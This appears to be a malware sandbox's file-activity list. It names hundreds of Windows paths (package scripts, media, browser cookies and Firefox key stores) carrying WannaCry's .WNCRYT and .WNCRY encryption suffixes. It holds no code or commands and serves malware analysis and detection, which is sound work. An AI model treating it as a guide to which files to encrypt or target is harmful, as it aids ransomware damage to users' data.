file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Get-IsRemote.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Init-Settings.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Invoke-FromTask.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Invoke-RetriableScript.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Log-BoxStarterMessage.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Out-BoxstarterLog.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Remove-BoxstarterError.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Remove-BoxstarterTask.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Start-TimedSection.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Stop-TimedSection.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Test-Admin.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Write-BoxstarterLogo.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Write-BoxstarterMessage.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\chocolateyinstall.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\setup.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\Boxstarter.HyperV\Enable-BoxstarterVHD.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\Boxstarter.HyperV\Enable-BoxstarterVM.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\chocolateyinstall.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\setup.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Disable-BingSearch.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Disable-GameBarTips.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Disable-InternetExplorerESC.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Disable-MicrosoftUpdate.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Disable-UAC.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Enable-MicrosoftUpdate.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Enable-RemoteDesktop.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Enable-UAC.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Get-LibraryNames.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Get-UAC.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Install-WindowsUpdate.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Move-LibraryDirectory.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Restart-Explorer.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-BoxstarterPageFile.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-BoxstarterTaskbarOptions.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-CornerNavigationOptions.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-ExplorerOptions.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-StartScreenOptions.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-TaskbarSmall.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-WindowsExplorerOptions.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Update-ExecutionPolicy.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Get-PackageParameters.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Get-UninstallRegistryKey.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Install-ChocolateyDesktopLink.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Write-ChocolateyFailure.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Write-ChocolateySuccess.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Write-FileUpdateLog.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Get-AppInstallLocation.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Get-AvailableDriveLetter.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Get-EffectiveProxy.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Get-PackageCacheLocation.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Get-WebContent.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Register-Application.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Remove-Process.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\chocolatey-dotnetfx.extension\extensions\DotNetFrameworkHelpers.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\chocolatey-dotnetfx.extension\extensions\Install-ChocolateyInstallPackageAndHandleExitCode.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\Get-WindowsUpdateErrorDescription.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\Install-ChocolateyPackageAndHandleExitCode.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\Install-WindowsUpdate.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\Test-WindowsUpdate.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\dotnet-5.0-runtime\tools\ChocolateyInstall.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\dotnet-6.0-runtime\tools\ChocolateyInstall.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\Firefox\tools\chocolateyInstall.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\Firefox\tools\chocolateyUninstall.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\Firefox\tools\helpers.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\GoogleChrome\tools\chocolateyInstall.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\GoogleChrome\tools\helpers.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\jre8\tools\chocolateyInstall.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\jre8\tools\chocolateyUninstall.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\KB2919355\tools\ChocolateyInstall.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\KB2919442\tools\ChocolateyInstall.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\KB2999226\tools\chocolateyinstall.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\KB3035131\Tools\ChocolateyInstall.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\KB3063858\Tools\ChocolateyInstall.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\KB3118401\Tools\ChocolateyInstall.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\powershell-core\tools\chocolateyinstall.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\powershell-core\tools\Reset-PWSHSystemPath.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\python3\tools\chocolateyInstall.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\python3\tools\helpers.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\vcredist140\tools\chocolateyInstall.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\vcredist140\tools\chocolateyUninstall.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\vcredist2005\tools\chocolateyInstall.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\vcredist2008\tools\chocolateyInstall.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\winrar\tools\chocolateyInstall.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib-bad\adobereader\tools\chocolateyinstall.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\redirects\RefreshEnv.cmd.WNCRYT
file: C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png.WNCRYT
file: C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png.WNCRYT
file: C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png.WNCRYT
file: C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png.WNCRYT
file: C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png.WNCRYT
file: C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png.WNCRYT
file: C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\tmp.edb.WNCRY
file: C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Windows.edb.WNCRY
file: C:\Users\All Users\Microsoft\User Account Pictures\guest.bmp.WNCRYT
file: C:\Users\All Users\Microsoft\User Account Pictures\user.bmp.WNCRYT
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile10.bmp.WNCRYT
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile11.bmp.WNCRYT
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile12.bmp.WNCRYT
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile13.bmp.WNCRYT
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile14.bmp.WNCRYT
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile15.bmp.WNCRYT
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile16.bmp.WNCRYT
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile17.bmp.WNCRYT
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile18.bmp.WNCRYT
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile19.bmp.WNCRYT
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile20.bmp.WNCRYT
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile21.bmp.WNCRYT
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile22.bmp.WNCRYT
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile23.bmp.WNCRYT
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile24.bmp.WNCRYT
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile25.bmp.WNCRYT
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile26.bmp.WNCRYT
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile27.bmp.WNCRYT
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile28.bmp.WNCRYT
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile29.bmp.WNCRYT
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile30.bmp.WNCRYT
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile31.bmp.WNCRYT
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile32.bmp.WNCRYT
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile33.bmp.WNCRYT
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile34.bmp.WNCRYT
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile35.bmp.WNCRYT
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile36.bmp.WNCRYT
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile37.bmp.WNCRYT
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile38.bmp.WNCRYT
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile39.bmp.WNCRYT
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile40.bmp.WNCRYT
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile41.bmp.WNCRYT
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile42.bmp.WNCRYT
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile43.bmp.WNCRYT
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile44.bmp.WNCRYT
file: C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 01.wma.WNCRYT
file: C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 02.wma.WNCRYT
file: C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 03.wma.WNCRYT
file: C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 04.wma.WNCRYT
file: C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 05.wma.WNCRYT
file: C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 06.wma.WNCRYT
file: C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 07.wma.WNCRYT
file: C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 08.wma.WNCRYT
file: C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 09.wma.WNCRYT
file: C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 10.wma.WNCRYT
file: C:\Users\All Users\Microsoft\Windows Defender\Scans\mpcache-97EFDC75E4C4E7D093DE204032CBD352A3D2415B.bin.DB.WNCRYT
file: C:\Users\All Users\Microsoft\Windows NT\MSFax\VirtualInbox\en-US\WelcomeFax.tif.WNCRYT
file: C:\Users\Public\Music\Sample Music\Kalimba.mp3.WNCRYT
file: C:\Users\Public\Music\Sample Music\Maid with the Flaxen Hair.mp3.WNCRYT
file: C:\Users\Public\Music\Sample Music\Sleep Away.mp3.WNCRYT
file: C:\Users\Public\Videos\Sample Videos\Wildlife.wmv.WNCRYT
file: C:\Users\user\AppData\Local\IconCache.db.WNCRYT
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.db.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\heavy_ad_intervention_opt_out.db.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\previews_opt_out.db.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\AppBlue.png.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\AppWhite.png.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\AutoPlayOptIn.gif.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\AutoPlayOptIn.png.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\CollectOneDriveLogs.bat.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ElevatedAppBlue.png.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ElevatedAppWhite.png.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\Error.png.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\OneDriveLogo.png.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\QuotaCritical.png.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\QuotaError.png.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\QuotaNearing.png.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ScreenshotOptIn.gif.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\Warning.png.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\cloud.svg.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\iceBucket.svg.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\onedrivePremium.svg.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\partiallyFreezing.svg.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\settings.svg.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\settingsdisabled.svg.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\stackedIceCubes.svg.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\waterGlass.svg.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_256.db.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\Windows\SipNotify\eoscontent\microsoft-logo.png.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\Windows\SipNotify\eoscontent\script.js.WNCRYT
file: C:\Users\user\AppData\Roaming\Microsoft\Document Building Blocks\1033\15\Built-In Building Blocks.dotx.WNCRYT
file: C:\Users\user\AppData\Roaming\Microsoft\Templates\Normal.dotm.WNCRYT
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\cert9.db.WNCRYT
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\key4.db.WNCRYT
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\prefs.js.WNCRYT
file: C:\Users\All Users\Boxstarter\BoxStarter.bat.WNCRYT
file: C:\Users\All Users\Boxstarter\NOTICE.txt.WNCRYT
file: C:\Users\All Users\Boxstarter\VERIFICATION.txt.WNCRYT
file: C:\Users\All Users\chocolatey\LICENSE.txt.WNCRYT
file: C:\Users\All Users\chocolatey\bin\BoxstarterShell.bat.WNCRYT
file: C:\Users\All Users\chocolatey\bin\_processed.txt.WNCRYT
file: C:\Users\All Users\chocolatey\config\chocolatey.config.backup.WNCRYT
file: C:\Users\All Users\chocolatey\extensions\chocolatey-dotnetfx\Get-DefaultChocolateyLocalFilePath.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\extensions\chocolatey-dotnetfx\Get-NativeInstallerExitCode.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\extensions\chocolatey-dotnetfx\Set-PowerShellExitCode.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\Get-NativeInstallerExitCode.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\Set-PowerShellExitCode.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\7zip.install\legal\VERIFICATION.txt.WNCRYT
file: C:\Users\All Users\chocolatey\lib\7zip.install\tools\chocolateyInstall.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\7zip.install\tools\chocolateyUninstall.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\autohotkey.install\tools\chocolateyInstall.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\NOTICE.txt.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\VERIFICATION.txt.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\BoxStarter.bat.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\NOTICE.txt.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\VERIFICATION.txt.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\NOTICE.txt.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\VERIFICATION.txt.WNCRYT
file: C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\NOTICE.txt.WNCRYT
file: C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\VERIFICATION.txt.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\NOTICE.txt.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\VERIFICATION.txt.WNCRYT
file: C:\Users\All Users\chocolatey\lib\chocolatey-dotnetfx.extension\extensions\Get-DefaultChocolateyLocalFilePath.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\chocolatey-dotnetfx.extension\extensions\Get-NativeInstallerExitCode.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\chocolatey-dotnetfx.extension\extensions\Set-PowerShellExitCode.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\Get-NativeInstallerExitCode.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\Set-PowerShellExitCode.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\dotnet-5.0-runtime\tools\data.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\dotnet-6.0-runtime\tools\data.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\dotnetfx\tools\ChocolateyInstall.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\KB3033929\Tools\ChocolateyInstall.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\OfficeProPlus2013\tools\chocolateyinstall.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\openjdk\tools\chocolateyBeforeModify.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\openjdk\tools\chocolateyinstall.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\openjdk\tools\chocolateyuninstall.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\python3\legal\VERIFICATION.txt.WNCRYT
file: C:\Users\All Users\chocolatey\lib\tapwindows\tools\chocolateyinstall.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\tapwindows\tools\chocolateyuninstall.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\vcredist140\tools\data.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\winrar\tools\chocolateyUninstall.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\winrar\tools\helpers.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib-bad\adobereader\tools\chocolateyuninstall.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\tools\checksum.license.txt.WNCRYT
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\chrome_shutdown_ms.txt.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\chrome_shutdown_ms.txt.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrivePersonal.cmd.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\errorIcon.svg.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\folder.svg.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\loading.svg.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_1024.db.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_32.db.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_96.db.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_sr.db.WNCRYT
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\0YHW5220.txt.WNCRYT
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\4GSWQ8EN.txt.WNCRYT
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\AJGBO9CI.txt.WNCRYT
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\CAP0QFT4.txt.WNCRYT
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\CJNGZV8R.txt.WNCRYT
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\ERX8C8MI.txt.WNCRYT
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\F003S46Q.txt.WNCRYT
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\H6EPX8R1.txt.WNCRYT
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\J29G05RA.txt.WNCRYT
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\J52208RT.txt.WNCRYT
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\MIYBJCU5.txt.WNCRYT
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\NFUEBPFN.txt.WNCRYT
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\U7UAY5KN.txt.WNCRYT
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\UKC8F8RG.txt.WNCRYT
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\VGVG2939.txt.WNCRYT
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\WFG456IG.txt.WNCRYT
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\X8F9LSJ0.txt.WNCRYT
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\YM639DI1.txt.WNCRYT
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\YX6BCVUK.txt.WNCRYT
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\AlternateServices.txt.WNCRYT
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\pkcs11.txt.WNCRYT
file: C:\ba69bdf0a250e352360c33\netfx_Full.mzz.WNCRYT
file: C:\ba69bdf0a250e352360c33\1025\eula.rtf
file: C:\ba69bdf0a250e352360c33\1028\eula.rtf
file: C:\ba69bdf0a250e352360c33\1029\eula.rtf
file: C:\ba69bdf0a250e352360c33\1030\eula.rtf
file: C:\ba69bdf0a250e352360c33\1031\eula.rtf
file: C:\ba69bdf0a250e352360c33\1032\eula.rtf
file: C:\ba69bdf0a250e352360c33\1033\eula.rtf
file: C:\ba69bdf0a250e352360c33\1035\eula.rtf
file: C:\ba69bdf0a250e352360c33\1036\eula.rtf
file: C:\ba69bdf0a250e352360c33\1037\eula.rtf
file: C:\ba69bdf0a250e352360c33\1038\eula.rtf
file: C:\ba69bdf0a250e352360c33\1040\eula.rtf
file: C:\ba69bdf0a250e352360c33\1041\eula.rtf
file: C:\ba69bdf0a250e352360c33\1042\eula.rtf
file: C:\ba69bdf0a250e352360c33\1043\eula.rtf
file: C:\ba69bdf0a250e352360c33\1044\eula.rtf
file: C:\ba69bdf0a250e352360c33\1045\eula.rtf
file: C:\ba69bdf0a250e352360c33\1046\eula.rtf
file: C:\ba69bdf0a250e352360c33\1049\eula.rtf
file: C:\ba69bdf0a250e352360c33\1053\eula.rtf
